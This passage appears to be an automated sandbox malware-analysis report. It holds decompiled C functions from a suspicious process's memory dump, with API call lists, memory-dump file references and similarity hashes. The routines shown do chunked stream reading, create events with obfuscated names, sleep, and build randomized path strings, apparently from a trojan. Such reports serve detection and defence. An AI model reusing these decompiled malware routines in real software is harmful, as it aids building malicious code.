                                0x04815da8
                                0x04815dad
                                0x04815db1
                                0x04815f23
                                0x04815f27
                                0x04815f27
                                0x04815db7
                                0x04815dbb
                                0x04815dc1
                                0x04815dc2
                                0x04815dcd
                                0x04815dd3
                                0x04815dd8
                                0x04815ddb
                                0x04815df5
                                0x04815e04
                                0x04815e10
                                0x04815e1a
                                0x04815e1f
                                0x04815e21
                                0x04815e24
                                0x04815edb
                                0x04815ee1
                                0x04815ef2
                                0x04815f05
                                0x04815f1b
                                0x00000000
                                0x04815f20
                                0x04815e2d
                                0x04815e34
                                0x04815e38
                                0x04815e3e
                                0x04815e40
                                0x04815e42
                                0x04815e44
                                0x04815e46
                                0x04815e50
                                0x04815e55
                                0x04815e57
                                0x04815e59
                                0x04815e5a
                                0x04815e5b
                                0x04815e5c
                                0x04815e63
                                0x04815e6a
                                0x04815e6d
                                0x04815e6d
                                0x04815e3a
                                0x04815e3a
                                0x04815e3a
                                0x04815e75
                                0x04815e7d
                                0x04815e89
                                0x04815e8e
                                0x04815e8e
                                0x04815e93
                                0x00000000
                                0x00000000
                                0x04815e95
                                0x04815e98
                                0x04815ea5
                                0x00000000
                                0x00000000
                                0x04815ea7
                                0x04815ea7
                                0x04815eb4
                                0x04815e8e
                                0x04815e93
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04815e93
                                0x04815ebe
                                0x04815ec1
                                0x04815ec4
                                0x04815ecb
                                0x04815ecb
                                0x04815ed8
                                0x00000000
                                0x04815ed8
                                0x04815dc4
                                0x04815dc8
                                0x04815dc9
                                0x04815dcb
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04815dcb
                                0x00000000

                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04815E46
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04815E5C
                                • memset.NTDLL ref: 04815F05
                                • memset.NTDLL ref: 04815F1B
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: 364079b2fa0e593d4041652b2e38e6e6b4c8955bd5c741a02ff0d89e39565218
                                • Instruction ID: 88bd929a1cf784311bb29c79c53c96c6f823e01763500403db5daa10a4f40033
                                • Opcode Fuzzy Hash: 364079b2fa0e593d4041652b2e38e6e6b4c8955bd5c741a02ff0d89e39565218
                                • Instruction Fuzzy Hash: 2E419431E00219BFEB10DE6CDC84BDE776DEF85754F104A6AB905E72A0DBB0BA448B41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 048114A8, Relevance: 6.1, APIs: 4, Instructions: 120synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 57%
                                			E048114A8(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_push( &_v24);
							_push(1);
							_push(0);
							if( *0x481a144() != 0) {
								_v8 = 8;
							} else {
								_t47 = E04816837(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x481a2c4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E048150CA(_v20);
											if(_v8 == 0) {
												_v8 = E048137FC(_v24, _t74);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E048125C7(__eax);
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

























                                0x048114a9
                                0x048114af
                                0x048114ba
                                0x048114ba
                                0x048114bc
                                0x04815aff
                                0x04815b02
                                0x04815b0b
                                0x04815b0e
                                0x04815b11
                                0x04815b19
                                0x04815c17
                                0x04815c22
                                0x04815c25
                                0x04815c27
                                0x00000000
                                0x04815c27
                                0x04815b1f
                                0x04815b22
                                0x04815c2a
                                0x04815c2a
                                0x04815b28
                                0x04815b2b
                                0x04815b2c
                                0x04815b2e
                                0x04815b37
                                0x04815c0e
                                0x04815b3d
                                0x04815b43
                                0x04815b4a
                                0x04815b4d
                                0x04815bfc
                                0x04815b53
                                0x00000000
                                0x04815b53
                                0x04815b53
                                0x04815b53
                                0x04815b53
                                0x04815b58
                                0x04815b5a
                                0x04815b5a
                                0x04815b67
                                0x04815b6f
                                0x00000000
                                0x00000000
                                0x04815b71
                                0x04815b7e
                                0x04815b84
                                0x04815b84
                                0x04815b87
                                0x00000000
                                0x00000000
                                0x04815b89
                                0x04815b94
                                0x04815ba8
                                0x04815bde
                                0x04815baa
                                0x04815baa
                                0x04815bb1
                                0x04815bb9
                                0x00000000
                                0x04815bbb
                                0x04815bbb
                                0x04815bc6
                                0x04815bc9
                                0x04815bd0
                                0x00000000
                                0x04815bd0
                                0x04815bc9
                                0x04815bb9
                                0x04815be1
                                0x04815be4
                                0x04815bec
                                0x04815bf7
                                0x04815bf7
                                0x00000000
                                0x04815bec
                                0x04815b91
                                0x00000000
                                0x04815bd3
                                0x04815bd3
                                0x00000000
                                0x04815bdc
                                0x04815c03
                                0x04815c03
                                0x04815c09
                                0x04815c09
                                0x04815b37
                                0x04815b22
                                0x04815c34
                                0x048114b1
                                0x048114b1
                                0x048114b8
                                0x048114c3
                                0x00000000
                                0x00000000
                                0x00000000
                                0x048114b8

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,04817134,00000000,?), ref: 04815B9B
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,04817134,00000000,?,?), ref: 04815BBB
                                  • Part of subcall function 048125C7: wcstombs.NTDLL ref: 04812687
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorLastObjectSingleWaitwcstombs
                                • String ID:
                                • API String ID: 2344289193-0
                                • Opcode ID: c3a6e5c9c2204add2a9c98994860a17c846264412fbad9411990ba7f440d6b28
                                • Instruction ID: f48159a4d0585f4a551b29e443a25f4a2ac2151335c8e3208064cf8d3ed5e673
                                • Opcode Fuzzy Hash: c3a6e5c9c2204add2a9c98994860a17c846264412fbad9411990ba7f440d6b28
                                • Instruction Fuzzy Hash: AC414CB5A00209FFDF109FA5C9849AEBBBDFB44344F104A6BE406E3160E774AE80DB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04815C35, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 04815C8C
                                • SysAllocString.OLEAUT32(04811E05), ref: 04815CCF
                                • SysFreeString.OLEAUT32(00000000), ref: 04815CE3
                                • SysFreeString.OLEAUT32(00000000), ref: 04815CF1
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 064774a95c5d7d917713e8d68401b10ff6ac47605a557a5ef1d34c5804e5cfde
                                • Instruction ID: 012579a8dd0148bf0be75f1ee166bf2357860d165db83292fe01147349fe3e7d
                                • Opcode Fuzzy Hash: 064774a95c5d7d917713e8d68401b10ff6ac47605a557a5ef1d34c5804e5cfde
                                • Instruction Fuzzy Hash: CD31E7B1900149FF8B05DF98D4848AE7BF9FF88340B10892FE509D7221D775AA45CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 048173C3, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E048173C3(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x481a2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x481a2d4; // 0x20bd5a8
				_t3 = _t8 + 0x481b8a2; // 0x61636f4c
				_t25 = 0;
				_t30 = E04812DEA(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x481a2f8, 1, 0, _t30);
					E048150CA(_t30);
				}
				_t12 =  *0x481a2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E0481513E() == 0) {
						_t28 =  *0x481a120( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E04816BE1(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E048151A8(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}















                                0x048173c4
                                0x048173cb
                                0x048173d5
                                0x048173d9
                                0x048173df
                                0x048173ec
                                0x048173f3
                                0x048173f7
                                0x04817409
                                0x0481740b
                                0x0481740b
                                0x04817410
                                0x04817417
                                0x04817422
                                0x04817438
                                0x0481743c
                                0x0481743e
                                0x04817443
                                0x04817443
                                0x04817450
                                0x04817454
                                0x04817458
                                0x00000000
                                0x00000000
                                0x04817466
                                0x0481746a
                                0x00000000
                                0x00000000
                                0x0481746a
                                0x04817454
                                0x00000000
                                0x0481746c
                                0x0481746c
                                0x0481746c
                                0x04817472
                                0x04817474
                                0x04817474
                                0x0481747e
                                0x04817482
                                0x04817494
                                0x04817494
                                0x04817498
                                0x0481749e
                                0x0481749e
                                0x048174a1
                                0x048174a3
                                0x048174a6
                                0x048174a6
                                0x048174ad
                                0x048174b3
                                0x048174b3

                                APIs
                                  • Part of subcall function 04812DEA: lstrlen.KERNEL32(E8FA7DD7,00000000,63699BC3,00000027,00000000,068D9C98,74ECC740,048155DE,?,63699BC3,E8FA7DD7,00000000,?,?,?,048155DE), ref: 04812E20
                                  • Part of subcall function 04812DEA: lstrcpy.KERNEL32(00000000,00000000), ref: 04812E44
                                  • Part of subcall function 04812DEA: lstrcat.KERNEL32(00000000,00000000), ref: 04812E4C
                                • CreateEventA.KERNEL32(0481A2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,048130E1,?,?,?), ref: 04817402
                                  • Part of subcall function 048150CA: HeapFree.KERNEL32(00000000,00000000,04814239,00000000,00000001,?,00000000,?,?,?,04816B8D,00000000,?,00000001), ref: 048150D6
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,048130E1,00000000,?,00000000,?,048130E1,?,?,?,?,?,?,?,0481211B), ref: 04817460
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,048130E1,?,?,?), ref: 0481748E
                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,048130E1,?,?,?), ref: 048174A6
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 73268831-0
                                • Opcode ID: 0a28739fadfa22e98e8feb05eef318416b7a80d2ccabde61b52b0cd6952368aa
                                • Instruction ID: abc3cce868972f6922c37de74ae389bb83a54efcbeaff61bd6e79fcd1b649b3c
                                • Opcode Fuzzy Hash: 0a28739fadfa22e98e8feb05eef318416b7a80d2ccabde61b52b0cd6952368aa
                                • Instruction Fuzzy Hash: 2821E172A013126BD7216F689C44B5A7BACEB48B65F010F2BFD02EB261DBA4FC008644
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04813032, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                Download Yara Rule
                                C-Code - Quality: 39%
                                			E04813032(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04816710(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E048115B9(_t23);
						}
					}
					return _t38;
				}
				if(E04814C8C(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x481a2f8, 1, 0,  *0x481a394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04814039(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04811D57(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04813C84(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E048173C3( &_v32, _t39);
					goto L13;
				}
			}












                                0x04813032
                                0x0481303f
                                0x04813045
                                0x04813046
                                0x04813047
                                0x04813048
                                0x04813049
                                0x0481304d
                                0x04813059
                                0x0481305d
                                0x048130e5
                                0x048130e5
                                0x048130e8
                                0x048130ea
                                0x048130f2
                                0x048130f8
                                0x048130fb
                                0x048130fb
                                0x048130f8
                                0x04813106
                                0x04813106
                                0x04813070
                                0x04813072
                                0x04813072
                                0x04813089
                                0x0481308d
                                0x04813090
                                0x0481309b
                                0x048130a2
                                0x048130a2
                                0x048130ae
                                0x048130af
                                0x048130bd
                                0x048130b1
                                0x048130b1
                                0x048130b2
                                0x048130b3
                                0x048130b4
                                0x048130b5
                                0x048130b6
                                0x048130b6
                                0x048130c2
                                0x048130c7
                                0x048130c9
                                0x048130cb
                                0x048130cb
                                0x048130d2
                                0x00000000
                                0x048130d4
                                0x048130d4
                                0x048130e1
                                0x00000000
                                0x048130e1

                                APIs
                                • CreateEventA.KERNEL32(0481A2F8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730,?,?,?,?,0481211B,?,00000001), ref: 04813083
                                • SetEvent.KERNEL32(00000000,?,?,?,?,0481211B,?,00000001,0481560C,00000002,?,?,0481560C), ref: 04813090
                                • Sleep.KERNEL32(00000BB8,?,?,?,?,0481211B,?,00000001,0481560C,00000002,?,?,0481560C), ref: 0481309B
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0481211B,?,00000001,0481560C,00000002,?,?,0481560C), ref: 048130A2
                                  • Part of subcall function 04814039: WaitForSingleObject.KERNEL32(00000000,?,?,?,048130C2,?,048130C2,?,?,?,?,?,048130C2,?), ref: 04814113
                                  • Part of subcall function 04814039: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,048130C2,?,?,?,?,?,0481211B,?), ref: 0481413B
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseEvent$CreateHandleObjectSingleSleepWait
                                • String ID:
                                • API String ID: 467273019-0
                                • Opcode ID: 77ec3d7a32025e0a55bf7e711baf3890c4832227176f9188e64b6b8a2e0b064e
                                • Instruction ID: ad1b7ce31ae781848d0a56c6e13a9555bf49dee9f7a6716d960b4caa7eeb6426
                                • Opcode Fuzzy Hash: 77ec3d7a32025e0a55bf7e711baf3890c4832227176f9188e64b6b8a2e0b064e
                                • Instruction Fuzzy Hash: 3A219872A00118ABEB10BFE9C8849EE77BDAB04354B054E27EE11E7120D775F944CBA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04814D09, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 78%
                                			E04814D09(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04816837(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                0x04814d15
                                0x04814d19
                                0x04814d1a
                                0x04814d1b
                                0x04814d1d
                                0x04814d1f
                                0x04814d24
                                0x04814d27
                                0x04814dbe
                                0x04814dc5
                                0x04814dc5
                                0x04814d30
                                0x04814d37
                                0x04814d47
                                0x04814d47
                                0x04814d4d
                                0x04814d4f
                                0x04814d54
                                0x04814d5d
                                0x04814d65
                                0x04814d68
                                0x04814d73
                                0x04814d77
                                0x04814d79
                                0x04814d7a
                                0x04814d83
                                0x04814d87
                                0x04814d98
                                0x04814d89
                                0x04814d8e
                                0x04814d93
                                0x04814da2
                                0x04814da2
                                0x04814d77
                                0x04814da8
                                0x04814dae
                                0x04814dae
                                0x04814db7
                                0x04814dbc
                                0x04814dbc
                                0x00000000

                                APIs
                                • Sleep.KERNEL32(000000C8), ref: 04814D37
                                • lstrlenW.KERNEL32(?), ref: 04814D6D
                                • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 04814D8E
                                • SysFreeString.OLEAUT32(?), ref: 04814DA2
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: 566dea12af63c6e66f16be8b06a0165e18096bbf73bfd7f1d46decb795d41170
                                • Instruction ID: fb09ab3caca676ca0b3d6b921622714917952c60923f85d8c68931872cccb1b3
                                • Opcode Fuzzy Hash: 566dea12af63c6e66f16be8b06a0165e18096bbf73bfd7f1d46decb795d41170
                                • Instruction Fuzzy Hash: 6E212F75900219FFCF10DFA8C88499EBBB8FF49715F10466AE945E7220E770AA45CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 048152E5, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E048152E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x481a290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x481a2a8; // 0x0
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x481a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                0x048152ed
                                0x048152f0
                                0x048152f6
                                0x0481530e
                                0x04815312
                                0x04815315
                                0x04815317
                                0x0481531a
                                0x0481531c
                                0x0481531f
                                0x04815321
                                0x04815321
                                0x04815323
                                0x0481532e
                                0x04815333
                                0x04815344
                                0x0481534c
                                0x04815351
                                0x04815354
                                0x04815357
                                0x04815359
                                0x0481535f
                                0x04815362
                                0x04815362
                                0x04815362
                                0x0481536d
                                0x04815372
                                0x0481537c

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,048162E0,00000000,?,00000000,048170D9,00000000,068D9630), ref: 048152F0
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04815308
                                • memcpy.NTDLL(00000000,068D9630,-00000008,?,?,?,048162E0,00000000,?,00000000,048170D9,00000000,068D9630), ref: 0481534C
                                • memcpy.NTDLL(00000001,068D9630,00000001,048170D9,00000000,068D9630), ref: 0481536D
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: dca08b37464e63ed743b6077742329903d13d808234640892a4203520c3681c6
                                • Instruction ID: 54cdcec9d2aa8bb1c3ca6cf1d1f5750c33ae2fcfe041a2f3e0a8f1f5095828fb
                                • Opcode Fuzzy Hash: dca08b37464e63ed743b6077742329903d13d808234640892a4203520c3681c6
                                • Instruction Fuzzy Hash: AC1129B2A00114BFD714CF69DC84E9EBBBEEBC1650B050677F404D7160EAB4AE00C7A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0481578C, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                Download Yara Rule
                                C-Code - Quality: 53%
                                			E0481578C(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E04816837(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x48192a4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x48192a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                0x04815797
                                0x0481579b
                                0x0481579d
                                0x0481579e
                                0x048157a6
                                0x048157a6
                                0x048157aa
                                0x00000000
                                0x00000000
                                0x048157a1
                                0x048157a2
                                0x048157a5
                                0x048157a5
                                0x048157b2
                                0x048157b9
                                0x048157bd
                                0x048157c5
                                0x048157cb
                                0x048157cd
                                0x048157d2
                                0x048157d6
                                0x048157d8
                                0x048157db
                                0x048157e2
                                0x048157e2
                                0x048157ec
                                0x048157ef
                                0x048157f2
                                0x048157f2
                                0x048157fe
                                0x048157fe
                                0x0481580b

                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,068D962C,?,?,?,04811128,068D962C,?,?,048155D3), ref: 048157A6
                                • StrTrimA.SHLWAPI(?,048192A4,00000002,?,?,?,04811128,068D962C,?,?,048155D3), ref: 048157C5
                                • StrChrA.SHLWAPI(?,00000020,?,?,?,04811128,068D962C,?,?,048155D3,?,?,?,?,?,04816BD8), ref: 048157D0
                                • StrTrimA.SHLWAPI(00000001,048192A4,?,?,?,04811128,068D962C,?,?,048155D3,?,?,?,?,?,04816BD8), ref: 048157E2
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Trim
                                • String ID:
                                • API String ID: 3043112668-0
